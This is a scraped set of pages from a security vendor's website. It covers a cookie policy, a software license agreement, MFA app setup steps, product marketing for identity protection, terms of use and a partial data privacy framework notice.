Windows or Mac) used by our visitors; monitor the performance of our Site and to continually improve it; and customize and enhance your online experience. We may also use a third party called Google Analytics to gather general information about how people use our website for the purposes of website optimization and analytics. To find out more about Google Analytics’ privacy policies, please visit http://www.google.com/policies/privacy/partners/. We, or our third-party mail service providers, may also include web beacons in e-mail messages to you in order to determine whether messages have been opened and links contained within them have been clicked. What types of cookies do we use? The types of cookies used by us and our partners in connection with the Site can be classified into one of three categories, namely ‘essential website cookies’, ‘functionality cookies’, and ‘analytics and performance cookies’. We’ve set out some further information about each category, and the purposes of the cookies we and third parties set, in the following table. Cookies necessary for essential website purposes These cookies are essential to provide you with services available through this Site and to use some of its features, such as access to secure areas. Without these cookies, services you have asked for, like transactional pages and secure login accounts, would not be possible. Functionality Cookies Functionality cookies record information about choices you’ve made and allow us to tailor the website to you. These cookies mean that when you continue to use or come back to the Site, we can provide you with our services as you have asked for them to be provided. For example, these cookies allow us to: Save your location preference if you have set your location on the homepage in order to receive localized information; Remember settings you have applied, such as layout, text size, preferences, and colors; Show you when you are logged in; and Store accessibility options.
Performance / Analytics Cookies We use performance/analytics cookies to analyze how the website is accessed, used, or is performing in order to provide you with a better user experience and to maintain, operate and continually improve the website. For example, these cookies allow us to: Better understand our website visitors so that we can improve how we present our content; Test different design ideas for particular pages, such as our homepage; Collect information about site visitors such as where they are located and what browsers they are using; Determine the number of unique users of the website; Improve the website by measuring any errors that occur; and Conduct research and diagnostics to improve product offerings. How to control or delete cookies You have the right to choose whether or not to accept cookies and we have explained how you can exercise this right below. However, please note that if you choose to refuse cookies you may not be able to use the full functionality of our Site. Most browsers allow you to change your cookie settings. These settings will typically be found in the “options” or “preferences” menu of your browser. In order to understand these settings and learn how to use them, please consult the “Help” function of your browser, or the documentation published online for your particular browser type and version. Need More Information? If you would like to find out more about cookies and their use on the Internet, you may find the following link useful: All About Cookies Cookies that have been set in the past If you have disabled one or more Cookies, we may still use information collected from cookies prior to your disabled preference being set; however, we will stop using the disabled cookie to collect any further information. Contact us If you have any questions or comments about this cookies policy, or privacy matters generally, please contact us via email at info@silverfort.com.
--- - Published: 2022-06-28 - Modified: 2025-08-21 - URL: https://www.silverfort.com/company/silverfort-software-license-agreement-01-21/ BY INSTALLING, ACCESSING AND/OR USING THE SILVERFORT AUTHENTICATION PLATFORM SOFTWARE (“SOFTWARE”), YOU EXPRESSLY ACKNOWLEDGE AND AGREE THAT YOU, OR THE COMPANY YOU REPRESENT, (“YOU” OR “LICENSEE”) ARE ENTERING INTO A LEGAL AGREEMENT WITH SILVERFORT INC. OR SILVERFORT LTD. (“SILVERFORT”), AND HAVE UNDERSTOOD AND AGREE TO COMPLY WITH, AND BE LEGALLY BOUND BY, THE TERMS AND CONDITIONS OF THIS AGREEMENT (“AGREEMENT”). SILVERFORT AND LICENSEE MAY EACH BE INDIVIDUALLY REFERRED TO HEREIN AS A “PARTY” AND COLLECTIVELY AS THE “PARTIES”. IF YOU HAVE ALREADY ENTERED INTO A SEPARATE LICENSE AGREEMENT DIRECTLY WITH SILVERFORT IN CONNECTION WITH THE ACCESS OR USE OF THE SOFTWARE THEN THIS AGREEMENT SHALL NOT APPLY. IF YOU HAVE PURCHASED THE LICENSE GRANTED HEREUNDER FROM A PARTNER, RESELLER OR DISTRIBUTOR AUTHORIZED BY SILVERFORT (“PARTNER”), TO THE EXTENT THERE IS ANY CONFLICT BETWEEN THIS AGREEMENT AND THE AGREEMENT ENTERED BETWEEN YOU AND THE RESPECTIVE PARTNER, INCLUDING ANY PURCHASE ORDER (“PARTNER ORDER FORM”), THEN, AS BETWEEN YOU AND SILVERFORT, THIS AGREEMENT SHALL PREVAIL. ANY RIGHTS GRANTED TO YOU IN SUCH PARTNER ORDER FORM WHICH ARE NOT CONTAINED IN THIS AGREEMENT, APPLY ONLY IN CONNECTION WITH SUCH PARTNER. IN THAT CASE, YOU MUST SEEK REDRESS OR REALIZATION OR ENFORCEMENT OF SUCH RIGHTS SOLELY WITH SUCH PARTNER AND NOT SILVERFORT. 1. Definitions. 1.1. “Affiliate” means any entity which directly or indirectly controls, is controlled by, or is under common control with a Party, where “control” means owning 50% or more of the voting securities of such entity or the ability to direct managerial decisions or board decisions of such entity. 1.2.
“Anonymous Information” means any information about the use or operation of the Software (including, but not limited to, aggregated analytics information, such as the overall number of users of the Software) collected or otherwise obtained by Silverfort which does not enable identification of the Licensee or any of its users and does not contain any identifiable information (such as user names, service names or network addresses) from Licensee’s network. For the avoidance of doubt, Anonymous Information does not include Licensee Data. 1.3. “Documentation” means any material that Silverfort provides or makes available (including online) to Licensee which contains instructions on how to utilize the Software. 1.4. “End User Order Form” means, as applicable, any written or electronic order form (i) issued by Silverfort and agreed to by Licensee or (ii) issued by Licensee pursuant to a Proposal made by Silverfort to Licensee, each for the provision by Silverfort of a license to use the Software and/or the Support Services to Licensee. 1.5. “Licensee Data” means any data or data logs containing identifiable information regarding activity of Licensee’s individual users (such as user names, service names or network addresses) of the Software. For the avoidance of doubt, Licensee Data does not include Anonymous Information. 1.6. “Order Form” means either a Partner Order Form or an End User Order Form, as applicable. 1.7. “Protected and Monitored User Accounts” means the user accounts, as well as service accounts, which are audited, analyzed and/or secured by the Software. 1.8. “Proposal” means any written or electronic price proposal, made by Silverfort to Licensee, setting forth the scope and price of the license to use the Software and/or the provision of the Support Services, as applicable. 1.9. “Support Services” means any support services provided by Silverfort to Licensee relating to the Software as set forth in the applicable Order Form. 1.10.
“Software Updates” means any updates, upgrades, modifications, improvements, enhancements, new versions, new releases and corrections to the Software and any derivative works based on the Software, including, in each case, any error corrections, patches and bug fixes. 2. License. 2.1. Software License. Subject to the terms and conditions of this Agreement, Silverfort hereby grants Licensee a non-exclusive, non-sublicensable, non-transferable, revocable license, for the duration of the Term (as defined below), to use the Software solely in object code format and solely for internal business security purposes (the “License”). The License shall be limited to the maximum number of Protected and Monitored User Accounts specified in the Order Form, which may be assigned to members of either Licensee or Licensee’s majority owned Affiliates. 2.2. Documentation. During the Term, Licensee (and, if relevant, its Affiliates) may use the Documentation solely for Licensee’s internal business security purposes and solely in connection with Licensee’s use of the Software. 2.3. Reservation of Rights. Other than the limited rights explicitly granted under this Agreement, Licensee shall have no other rights, express or implied, in the Software and all such rights are reserved by Silverfort. 2.4. Use Restrictions.
Licensee shall not, directly or indirectly: (i) sell, lease, sublicense or distribute the Software, or any part thereof, or otherwise transfer the Software, or any part thereof, or allow any third party to use the Software, or any part thereof, in any manner; (ii) install the Software, or any part thereof, on a server not owned by, and in the control and possession of Licensee or its Affiliates; (iii) reverse engineer, decompile, disassemble or otherwise reduce to human-perceivable form the Software’s source code, or any part thereof; (iv) copy, modify, revise, enhance or alter the Software, or any part thereof; (v) make the Software, or any part thereof, accessible to other users or the public; (vi) circumvent, disable or otherwise interfere with security-related features of the Software, or any part thereof, or features that prevent or restrict use or copying of any content or that enforce limitations on use of the Software, or any part thereof; (vii) interfere or attempt to interfere with the integrity or proper working of the Software, or any part thereof; (viii) remove, alter or obscure any proprietary notice displayed on or via the Software, or any part thereof; (ix) use the Software, or any part thereof, to violate any applicable laws; (x) represent that it possesses any proprietary interest in the Software, or any part thereof; (xi) publish or disclose to any third party any reviews, testing information or the results of any benchmark test of the Software, or any part thereof, without Silverfort’s express prior written consent; (xii) attempt to circumvent or otherwise bypass the maximum number of Protected and Monitored User Accounts set forth in the Order Form; and/or (xiii) solicit, encourage, permit, allow or assist any person to do any of the foregoing. 2.5. Open Source Licenses. The Software includes certain open source code software and materials that are subject to their respective open source licenses.
A list of any third-party open source software and related open source licenses is available on Silverfort’s online customer portal. 2.6. Software Updates. Unless otherwise specified in an Order Form, during the Term, from time to time, Silverfort may, in its sole discretion, deliver Software Updates to Licensee. From time to time, Silverfort shall update the Documentation to reflect any Software Updates and shall make such updated Documentation available to Licensee. 2.7. Support Services. Subject to the terms and conditions of this Agreement, Silverfort shall provide the Support Services if and as provided in any Order Form for the duration of the Term. 3. Licensee Data and Analytics Information. 3.1. As Silverfort operates the Software, it may monitor Licensee Data in order to detect and prevent cyber threats. Licensee is the exclusive owner of all Licensee Data. To the extent that Licensee Data is made available to Silverfort, during the Term, Licensee hereby grants Silverfort a non-exclusive, irrevocable, non-sublicensable, royalty-free, fully paid-up right and license to use such Licensee Data to perform Silverfort’s obligations under this Agreement and any Order Form. 3.2. Licensee represents and warrants to Silverfort that, to the extent Licensee Data includes any personally identifiable information or personal data (each as defined in applicable data privacy laws) (“Personal Data”), Licensee has the appropriate legal bases, required consents or permits and has acted in compliance with all applicable privacy laws and regulations (including, but not limited to, the Regulation (EU) 2016/679 (General Data Protection Regulation) (“GDPR”)), as to allow Silverfort to receive (including transfers outside of the European Economic Area), process and use such Licensee Data solely in order to perform Silverfort’s obligations under this Agreement and any Order Form.
To the extent that Licensee needs a data processing agreement, Licensee shall request Silverfort’s Data Processing Agreement (“DPA”) and return it duly signed to Silverfort. 3.3. In the event Licensee (i) fails to comply with any applicable data privacy law or regulation (including the GDPR), (ii) fails to comply with any provision of the DPA and/or (iii) fails to sign the DPA and return an executed version of the DPA to Silverfort, then: (a) to the maximum extent permitted by law, Licensee shall be solely and fully responsible and liable for any such breach, violation, infringement and/or processing of Personal Data by Silverfort or any of Silverfort’s affiliates or subsidiaries (including, without limitation, Silverfort’s employees, officers, directors, subcontractors and agents), and the consequences of any of the foregoing; (b) in the event of any claim of any kind related to any such breach, violation or infringement and/or any claim related to processing of Personal Data, Licensee shall defend, hold harmless and indemnify Silverfort and Silverfort’s affiliates and subsidiaries (including, without limitation, their employees, officers, directors, subcontractors and agents) from and against any and all losses, penalties, fines, damages, liabilities, settlements, costs and expenses, including reasonable attorneys’ fees; and (c) the limitation of Licensee’s liability under Section 10 below shall not apply with respect to paragraphs (a) and (b) above. 4. Usage Reporting and Audit. Subject to the terms of the Order Form, if applicable and requested by Silverfort, Licensee shall report to Silverfort the maximum number of Protected and Monitored User Accounts which utilize the Software in order to verify that Licensee’s usage of the Software is in accordance with the terms of the Order Form.
Silverfort may, from time to time, audit Licensee’s compliance with this Agreement (including the limitations on the number of Protected and Monitored User Accounts under Section 2.1), and Licensee will modify its actions in order to fully comply with this Agreement as may be reasonably required by Silverfort. 5. Payments. The licenses granted hereunder and the provision of Support Services, to the extent applicable, are subject to the full payment of the applicable fees as set forth in the Order Form. 6. Title & Ownership. 6.1. Software. The Software is not for sale and is and shall remain Silverfort’s exclusive property. All right, title, and interest in and to the Software, including any intellectual property rights therein, and any and all improvements and derivative works thereof are and shall remain, as between the Parties, owned exclusively by Silverfort. To the extent that Licensee acquires any right, title or interest in or to any Software, Licensee hereby irrevocably and perpetually assigns to Silverfort all such right, title and interest. Nothing herein constitutes a waiver of Silverfort’s intellectual property rights under any applicable laws. 6.2. Feedback. If Silverfort receives any feedback (including, but not limited to, questions, comments and suggestions) regarding any of its Support Services and/or products (including the Software) (collectively, “Feedback”), all Feedback, including all intellectual property rights therein, shall be owned exclusively by Silverfort and shall be considered Silverfort’s Confidential Information. Licensee hereby irrevocably and perpetually assigns to Silverfort all Feedback and all intellectual property rights therein and Licensee hereby waives any and all moral rights that Licensee may have in such Feedback. 6.3.
Any Anonymous Information which is derived from the use of the Services is owned by Silverfort and may be used, among others, for providing the Service, for development, and/or for statistical purposes. 7. Confidentiality. 7.1. A Party (the “Disclosing Party”) may from time to time during the Term disclose to the other Party (the “Receiving Party”) certain confidential, proprietary or other non-public information, including technical, marketing, financial, employee and planning (“Confidential Information”). Regardless of whether Confidential Information is identified by the Disclosing Party as confidential, any information... --- - Published: 2022-06-28 - Modified: 2025-02-27 - URL: https://www.silverfort.com/enrolling-users/ Installing Silverfort Mobile App
1. On your mobile device, open the App Store or Google Play Store.
2. Search for Silverfort.
3. Install the Silverfort app.
Configuring Silverfort Mobile App Once you have installed the mobile app, you need to configure it for MFA for your organization.
1. On your mobile device, open the Silverfort app. If this is the first time you are using the app, you are prompted to enter your email address. You must enter your corporate email address. Note: If you have already configured Silverfort with an email address and want to configure an additional email address, on the app’s home screen, tap Add User.
2. Enter your email address, then tap Send Verification Code. Silverfort checks the email address with your organization’s Silverfort MFA servers and, if you have been configured for MFA, you will receive an email containing a verification code.
3. Open your email and locate your verification code.
4. Type the verification code into Silverfort, then tap Verify Account.
5. Upon successful verification, the app confirms you have been successfully verified.
Using Silverfort Mobile App Whenever you access a corporate resource that is protected with Silverfort’s MFA, after entering your login credentials, you will need to confirm your intent to log into the resource. Log in to the corporate resource as usual. After entering your credentials, you will be prompted to confirm your identity. Open the Silverfort Mobile App. To confirm your identity and log in to the corporate resource, tap YES. Once your identity has been verified, you are logged into the corporate resource. If you are prompted and it is not you attempting to access a corporate resource, tap NO. --- - Published: 2022-06-28 - Modified: 2024-06-05 - URL: https://www.silverfort.com/logo-png/ Logo.png (170×38) | Silverfort
--- - Published: 2022-06-14 - Modified: 2025-07-21 - URL: https://www.silverfort.com/use-cases/cyber-insurance-compliance/ Cyber insurance compliance Coverage is complete. Compliance is built in. Meet and exceed the extended MFA requirements of cyber insurance policies with end-to-end identity security. Rapid implementation. Rapid compliance. Rapid return on investment. Cut through compliance complexity with unified identity security. Silverfort simplifies and expedites compliance by unifying the silos of identity infrastructure. Our platform seamlessly extends security controls across every identity, resource and environment, so you can check every box. Secure every admin account Extend MFA across all on-prem and cloud resources—from legacy apps to command line tools—with our Runtime Access Protection. Accelerated integration and ROI Achieve universal identity security at speed.
Fully deploy in your production environment within the timeframe set by your broker. Total compliance assured Renew your cyber liability policy with confidence. With universal coverage, you can check off all MFA requirements and more. Learn more about our platform The Silverfort Identity Security Platform How we help you achieve full cyber insurance compliance Meet every cyber insurance requirement at speed. Extend MFA everywhere Including all admin access, remote network access, and command-line tools. Protect all service accounts Identify and protect every NHI and service account in your environment. Stop ransomware Halt lateral movement, privilege escalation and ransomware in its tracks. --- - Published: 2022-05-09 - Modified: 2025-07-21 - URL: https://www.silverfort.com/use-cases/zero-trust-security/ Identity Zero Trust Trust made easy. Bring zero trust security to the identity control plane with adaptive least-privilege access policies across every on-prem and cloud resource—all without making any changes to your applications or infrastructure. Zero trust that's fast and efficient. Identity is the ultimate place to start your Zero Trust journey, with continuous analysis and enforcement of security controls on every user access. Rapid time to value Protect and observe all user access within days of initial deployment, with no costly and complex changes to your network or identity infrastructure. High precision analysis Eliminate the possibility of malicious access with compromised credentials by preventing users from accessing resources without rigorous risk analysis and verification.
Real-time enforcement Trigger MFA, JIT, and Deny Access to block malicious access to your resources and halt the spread of live attacks. Learn more about our platform The Silverfort Identity Security Platform How it works All resources: from legacy on-prem to the cloud. Proactively reduce the attack surface Apply identity-based segmentation across your hybrid environment so users can only access the resources they need, reducing blast radius in a compromise scenario. Extend protection to all resources View and monitor every user access attempt across your entire identity infrastructure, from on-prem AD to SaaS applications and cloud workloads. Eliminate threat exposures Identify and resolve any weaknesses and excessive trust within your hybrid environment that expose your users to compromise and your resources to malicious access. --- - Published: 2022-04-18 - Modified: 2025-07-21 - URL: https://www.silverfort.com/platform/universal-multi-factor-authentication/ Universal Multi-Factor Authentication Push MFA beyond limits. Protect everything. When we say universal, we mean it. Extend MFA protection to Active Directory managed resources without modifying them, including legacy applications, command line interfaces and OT systems. Universal MFA that adapts to your environment.
Silverfort’s end-to-end Identity Security Platform seamlessly fuses with your entire identity infrastructure, so you can protect your on-prem resources with cloud-level MFA. 360 Active Directory protection Silverfort is the only solution that natively integrates with Active Directory to enforce MFA on every Kerberos, NTLM, and LDAP authentication. Minimize your attack surface and block attacks Configure policies to mitigate risks disclosed by Silverfort’s ISPM, or block active attacks that were detected by Silverfort’s ITDR. Extend your MFA of choice Integrate the MFA solution you’re already using with Silverfort to extend its protection to all AD resources—without affecting your employees’ user experience. Learn more about our platform One end-to-end platform. All MFA needs covered. Protect all resources and access interfaces Extend your existing MFA solution to cover all your resources and access interfaces that weren’t natively supported: homegrown applications, legacy systems, admin access tools, file systems and databases, VPN, IT infrastructure, desktop login, RDP & SSH, SaaS applications, VDI & Citrix. Combine static and risk-based policies Bolster your identity security posture by combining traditional rule-based policies with risk-based policies that trigger MFA in response to changes in users’ and resources’ risk levels. Replace, extend, or consolidate your existing MFA solution Your environment, your choice. Adopt Silverfort as your single MFA provider, or use it to complement or extend the MFA solution you’re currently using to lower costs and provide a more consistent user experience. See Silverfort's universal MFA in action. Scaling MFA to all on-prem environments & systems "Many large enterprises find it difficult to quickly implement secure employee authentication across all their different environments.
Silverfort’s innovative solution simplifies this process without the need for system modifications, so enterprises can save time and money." William Woo, CIO | Singtel Group The challenge Core parts of Singtel’s environments and systems are on-prem and required MFA protection. Singtel quickly realized that implementing MFA agents on every application server was impractical due to the large number of machines and code change requirements. They needed a more scalable solution. Our solution Since deploying Silverfort, Singtel has successfully scaled MFA protection capabilities to all of their on-prem environments and systems. Singtel’s infrastructure team was pleased that no code changes to applications or deployment of agents were needed. --- - Published: 2022-04-18 - Modified: 2025-07-21 - URL: https://www.silverfort.com/use-cases/ransomware-protection/ Lateral movement & ransomware protection Stop attacks from spreading in real time. Defend against ransomware attacks and put a stop to lateral movement by detecting and blocking malicious authentications as they happen. The identity way is the only way. Silverfort is the only solution that can enforce MFA at scale in any environment to disable lateral movement and ransomware spread. MFA without limits Block ransomware from spreading through your network using compromised credentials by placing MFA policies on PsExec, PowerShell, WMI and more. Prevention—not just detection MFA outsources the initial response to the entire workforce, engaging the security team only in true positives where the compromise has been validated by the user. Privileged access protection All admins, including both human users and service accounts, are protected with an automated least-privileged access policy to minimize compromise impact and prevent malicious abuse of their access privileges.
The Silverfort Identity Security Platform: how it works. Automate protection with real-time access controls.

Detect with accuracy. Our platform analyzes every authentication and access attempt to detect the use of malicious TTPs for privilege escalation or lateral movement.

Protect with confidence. Configure MFA policies to trigger protection for detected risks, disabling adversaries from using compromised credentials for malicious access.

Secure service accounts. Enforce automated access policies on your service accounts to ensure they cannot access any resources outside of their designated scope.

---
- Published: 2022-03-30
- Modified: 2025-08-21
- URL: https://www.silverfort.com/terms-of-use/

Welcome to www.silverfort.com (together with its subdomains, Content, Marks and services, the “Site”). Please read the following Terms of Use carefully before using this Site so that you are aware of your legal rights and obligations with respect to Silverfort Inc. and its subsidiaries (“Silverfort”, “we”, “our” or “us”). By accessing or using the Site, you expressly acknowledge and agree that you are entering a legal agreement with us and have understood and agree to comply with, and be legally bound by, these Terms of Use, together with the Privacy Policy (the “Terms”). You hereby waive any applicable rights to require an original (non-electronic) signature or delivery or retention of non-electronic records, to the extent not prohibited under applicable law.
If you do not agree to be bound by these Terms please do not access or use the Site.

1. Background. The Site is intended to provide information about Silverfort’s authentication products and services.

2. Modification. We reserve the right, at our discretion, to change these Terms at any time. Such change will be effective ten (10) days following posting of the revised Terms on the Site, and your continued use of the Site thereafter means that you accept those changes.

3. Ability to Accept Terms. The Site is only intended for individuals aged eighteen (18) years or older. If you are under 18 years please do not visit or use the Site.

4. Site Access. For such time as these Terms are in effect, we hereby grant you permission to visit and use the Site provided that you comply with these Terms and applicable law.

5. Restrictions. You shall not: (i) copy, distribute or modify any part of the Site without our prior written authorization; (ii) use, modify, create derivative works of, transfer (by sale, resale, license, sublicense, download or otherwise), reproduce, distribute, display or disclose Content (defined below), except as expressly authorized herein; (iii) disrupt servers or networks connected to the Site; (iv) use or launch any automated system (including without limitation, “robots” and “spiders”) to access the Site; and/or (v) circumvent, disable or otherwise interfere with security-related features of the Site or features that prevent or restrict use or copying of any Content or that enforce limitations on use of the Site.

6. Intellectual Property Rights.

6.1 Material and Marks. The (i) content on the Site, including without limitation, the text, documents, articles, brochures, descriptions, products, software, graphics, photos, sounds, videos, interactive features, and services (collectively, the “Materials”), and (ii) the trademarks, service marks and logos contained therein (“Marks”), are the property of Silverfort and/or its licensors and may be protected by applicable copyright or other intellectual property laws and treaties. “Silverfort”, the Silverfort logo, and other marks are Marks of Silverfort or its affiliates. All other trademarks, service marks, and logos used on the Site are the trademarks, service marks, or logos of their respective owners. We reserve all rights not expressly granted in and to the Site and the Content.

6.2 Use of Content. Content on the Site is provided to you for your information and personal use only and may not be used, modified, copied, distributed, transmitted, broadcast, displayed, sold, licensed, de-compiled, or otherwise exploited for any other purposes whatsoever without our prior written consent. If you download or print a copy of the Content you must retain all copyright and other proprietary notices contained therein.

7. Information Description. We attempt to be as accurate as possible. However, we cannot and do not warrant that the Content available on the Site is accurate, complete, reliable, current, or error-free. We reserve the right to make changes in or to the Content, or any part thereof, in our sole judgment, without the requirement of giving any notice prior to or after making such changes to the Content. Your use of the Content, or any part thereof, is made solely at your own risk and responsibility.

8. Links.

8.1 The Site may contain links, and may enable you to post content, to third party websites that are not owned or controlled by Silverfort.
We are not affiliated with, have no control over, and assume no responsibility for the content, privacy policies, or practices of, any third party websites. You: (i) are solely responsible and liable for your use of and linking to third party websites and any content that you may send or post to a third party website; and (ii) expressly release Silverfort from any and all liability arising from your use of any third party website. Accordingly, we encourage you to read the terms and conditions and privacy policy of each third party website that you may choose to visit.

8.2 Silverfort permits you to link to the Site provided that: (i) you link to but do not replicate any page on this Site; (ii) the hyperlink text shall accurately describe the Content as it appears on the Site; (iii) you shall not misrepresent your relationship with Silverfort or present any false information about Silverfort and shall not imply in any way that we are endorsing any services or products, unless we have given you our express prior consent; (iv) you shall not link from a website (“Third Party Website”) which prohibits linking to third parties; (v) such Third Party Website does not contain content that (a) is offensive or controversial (both at our discretion), or (b) infringes any intellectual property, privacy rights, or other rights of any person or entity; and/or (vi) you, and your website, comply with these Terms and applicable law.

9. Privacy. We will use any personal information that we may collect or obtain in connection with the Site in accordance with our privacy policy which is available at info@silverfort.com

10. Warranty Disclaimers.

10.1 This section applies whether or not the services provided under the Site are for payment. Applicable law may not allow the exclusion of certain warranties, so to that extent certain exclusions set forth herein may not apply.

10.2 THE SITE IS PROVIDED ON AN “AS IS” AND “AS AVAILABLE” BASIS, AND WITHOUT WARRANTIES OF ANY KIND EITHER EXPRESS OR IMPLIED. SILVERFORT HEREBY DISCLAIMS ALL WARRANTIES, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO IMPLIED WARRANTIES OF MERCHANTABILITY, TITLE, FITNESS FOR A PARTICULAR PURPOSE, NON-INFRINGEMENT, AND THOSE ARISING BY STATUTE OR FROM A COURSE OF DEALING OR USAGE OF TRADE. SILVERFORT DOES NOT GUARANTEE THAT THE SITE WILL BE FREE OF BUGS, SECURITY BREACHES, OR VIRUS ATTACKS. THE SITE MAY OCCASIONALLY BE UNAVAILABLE FOR ROUTINE MAINTENANCE, UPGRADING, OR OTHER REASONS. YOU AGREE THAT SILVERFORT WILL NOT BE HELD RESPONSIBLE FOR ANY CONSEQUENCES TO YOU OR ANY THIRD PARTY THAT MAY RESULT FROM TECHNICAL PROBLEMS OF THE INTERNET, SLOW CONNECTIONS, TRAFFIC CONGESTION OR OVERLOAD OF OUR OR OTHER SERVERS. WE DO NOT WARRANT, ENDORSE OR GUARANTEE ANY CONTENT, PRODUCT, OR SERVICE THAT IS FEATURED OR ADVERTISED ON THE SITE BY A THIRD PARTY.

10.3 YOUR RELIANCE ON, OR USE OF, ANY USER SUBMISSION, OR INTERACTION WITH ANY SITE USER OR OWNER, IS AT YOUR SOLE RISK. IF YOU HAVE A DISPUTE WITH ANY SITE USER OR OWNER IN CONNECTION WITH THE SITE OR ANY USER SUBMISSION, YOU AGREE THAT SILVERFORT IS NOT LIABLE FOR ANY CLAIMS OR DAMAGES ARISING OUT OF OR CONNECTED WITH SUCH A DISPUTE. SILVERFORT RESERVES THE RIGHT, BUT HAS NO OBLIGATION, TO MONITOR ANY SUCH DISPUTE.

10.4 EXCEPT AS EXPRESSLY STATED IN OUR PRIVACY POLICY, SILVERFORT DOES NOT MAKE ANY REPRESENTATIONS, WARRANTIES OR CONDITIONS OF ANY KIND, EXPRESS OR IMPLIED, AS TO THE SECURITY OF ANY INFORMATION YOU MAY PROVIDE OR ACTIVITIES YOU ENGAGE IN DURING THE COURSE OF YOUR USE OF THE SITE.

11. Limitation of Liability.

11.1 TO THE FULLEST EXTENT PERMISSIBLE BY LAW, SILVERFORT SHALL NOT BE LIABLE FOR ANY DIRECT, INDIRECT, EXEMPLARY, SPECIAL, CONSEQUENTIAL, OR INCIDENTAL DAMAGES OF ANY KIND, OR FOR ANY LOSS OF DATA, REVENUE, PROFITS OR REPUTATION, ARISING UNDER THESE TERMS OR OUT OF YOUR USE OF, OR INABILITY TO USE, THE SITE, EVEN IF SILVERFORT HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES OR LOSSES. Some jurisdictions do not allow the limitation or exclusion of liability for incidental or consequential damages, so the above limitations may not apply to you.

11.2 IN NO EVENT SHALL THE AGGREGATE LIABILITY OF SILVERFORT FOR ANY DAMAGES ARISING UNDER THESE TERMS OR OUT OF YOUR USE OF, OR INABILITY TO USE, THE SITE EXCEED THE TOTAL AMOUNT OF FEES, IF ANY, PAID BY YOU TO SILVERFORT FOR USING THE SITE DURING THE THREE (3) MONTHS PRIOR TO BRINGING THE CLAIM.

12. Indemnity. You agree to defend, indemnify and hold harmless Silverfort and our affiliates, and our respective officers, directors, employees and agents, from and against any and all claims, damages, obligations, losses, liabilities, costs and expenses (including but not limited to attorney’s fees) arising from: (i) your use of, or inability to use, the Site; (ii) your User Submissions; (iii) your interaction with any Site user; or (iv) your violation of these Terms.

13. Term and Termination. These Terms are effective until terminated by Silverfort or you. Silverfort, in its sole discretion, has the right to terminate these Terms and/or your access to the Site, or any part thereof, immediately at any time and with or without cause (including, without any limitation, for a breach of these Terms). Silverfort shall not be liable to you or any third party for termination of the Site, or any part thereof. If you object to any term or condition of these Terms, or any subsequent modifications thereto, or become dissatisfied with the Site in any way, your only recourse is to immediately discontinue use of the Site.
Upon termination of these Terms, you shall cease all use of the Site. This Section 13 and Sections 6 (Intellectual Property Rights), 9 (Privacy), 10 (Warranty Disclaimers), 11 (Limitation of Liability), 12 (Indemnity), and 14 (Independent Contractors) to 17 (General) shall survive termination of these Terms.

14. Independent Contractors. You and Silverfort are independent contractors. Nothing in these Terms creates a partnership, joint venture, agency, or employment relationship between you and Silverfort. You must not under any circumstances make, or undertake, any warranties, representations, commitments or obligations on behalf of Silverfort.

15. Assignment. These Terms, and any rights and licenses granted hereunder, may not be transferred or assigned by you but may be assigned by Silverfort without restriction or notification to you. Any prohibited assignment shall be null and void.

16. Governing Law. Silverfort reserves the right to discontinue or modify any aspect of the Site at any time. These Terms and the relationship between you and Silverfort shall be governed by and construed in accordance with the laws of the State of New York, without regard to its principles of conflict of laws, and only the courts in New York County, New York, shall have jurisdiction in any conflict or dispute arising out of these Terms.

17. General. These Terms shall constitute the entire agreement between you and Silverfort concerning the Site. If any provision of these Terms is deemed invalid by a court of competent jurisdiction, the invalidity of such provision shall not affect the validity of the remaining provisions of these Terms, which shall remain in full force and effect. No waiver of any term of these Terms shall be deemed a further or continuing waiver of such term or any other term, and a party’s failure to assert any right or provision under these Terms shall not constitute a waiver of such right or provision.
YOU AGREE THAT ANY CAUSE OF ACTION THAT YOU MAY HAVE ARISING OUT OF OR RELATED TO THE SITE MUST COMMENCE WITHIN ONE (1) YEAR AFTER THE CAUSE OF ACTION ACCRUES. OTHERWISE, SUCH CAUSE OF ACTION IS PERMANENTLY BARRED.

Last updated: July 25, 2018.

---
- Published: 2022-03-30
- Modified: 2025-08-21
- URL: https://www.silverfort.com/silverfort-dpf-notice/

Effective: September, 2024

This DPF notice (“Notice”) governs Silverfort Inc.’s (“Silverfort”, “We” or “Our”) participation in the EU-U.S. DPF, the UK Extension to the EU-U.S. DPF, and the Swiss-U.S. DPF programs with respect to the Processing of Personal Data as further explained in Section 1 below. If there is any conflict between the terms in this Notice and the DPF principles, the DPF principles shall govern. To learn more about the DPF and its principles please visit https://www.dataprivacyframework.gov/s/.

“Personal Data” means any information relating to an identified or identifiable natural person; an identifiable natural person is one who can be identified, directly or indirectly, in particular by reference to an identifier such as a name, an identification number, location data, an online identifier or to one or more factors specific to the physical, physiological, genetic, mental, economic, cultural or social identity of that natural person.

“Process”, “Processing” means any operation or set of operations which is performed on Personal Data or on sets of Personal Data, whether or not by automated means, such as collection, recording, organization, structuring, storage, adaptation or alteration, retrieval, consultation, use, disclosure by transmission, dissemination or otherwise making available, alignment or combination, restriction, erasure or destruction.

1. SCOPE.
Silverfort’s participation in the DPF applies to non-HR Personal Data that is subject to the EU, UK, and Swiss data protection laws that Silverfort receives in the context of the provision of Silverfort's Services (as defined below), including from customers, Silverfort's affiliates or other third parties.

2. PURPOSES OF DATA PROCESSING.

Silverfort complies with the principles of the EU-U.S. DPF (and the UK Extension to the EU-U.S. DPF) and the Swiss-U.S. DPF regarding the collection, use, and retention of Personal Data transferred to the United States from the European Union, United Kingdom, and Switzerland. Our program covers transfers of Personal Data in the following cases: (i) to provide Silverfort’s services; (ii) for Silverfort’s customers to be able to use Silverfort’s services; and/or (iii) to comply with other documented reasonable instructions provided by Silverfort’s customers (the “Service”).

The categories of Personal Data collected and Processed by Silverfort include, without limitation: full name; username / log-in details; email address; title / job position; IP address; User ID (random number generated by the Services); handling orders; delivering products and services; processing payments; communicating with customers, users, vendors, and sellers about orders, products, services and promotional offers; and/or any other Personal Data or information that Silverfort’s customers provide or instruct Silverfort to Process in the context of Silverfort’s Services. Silverfort has certified to the DoC that it adheres to the DPF Principles and Our DPF certification is available here.

3. ONWARD TRANSFERS OF PERSONAL DATA.

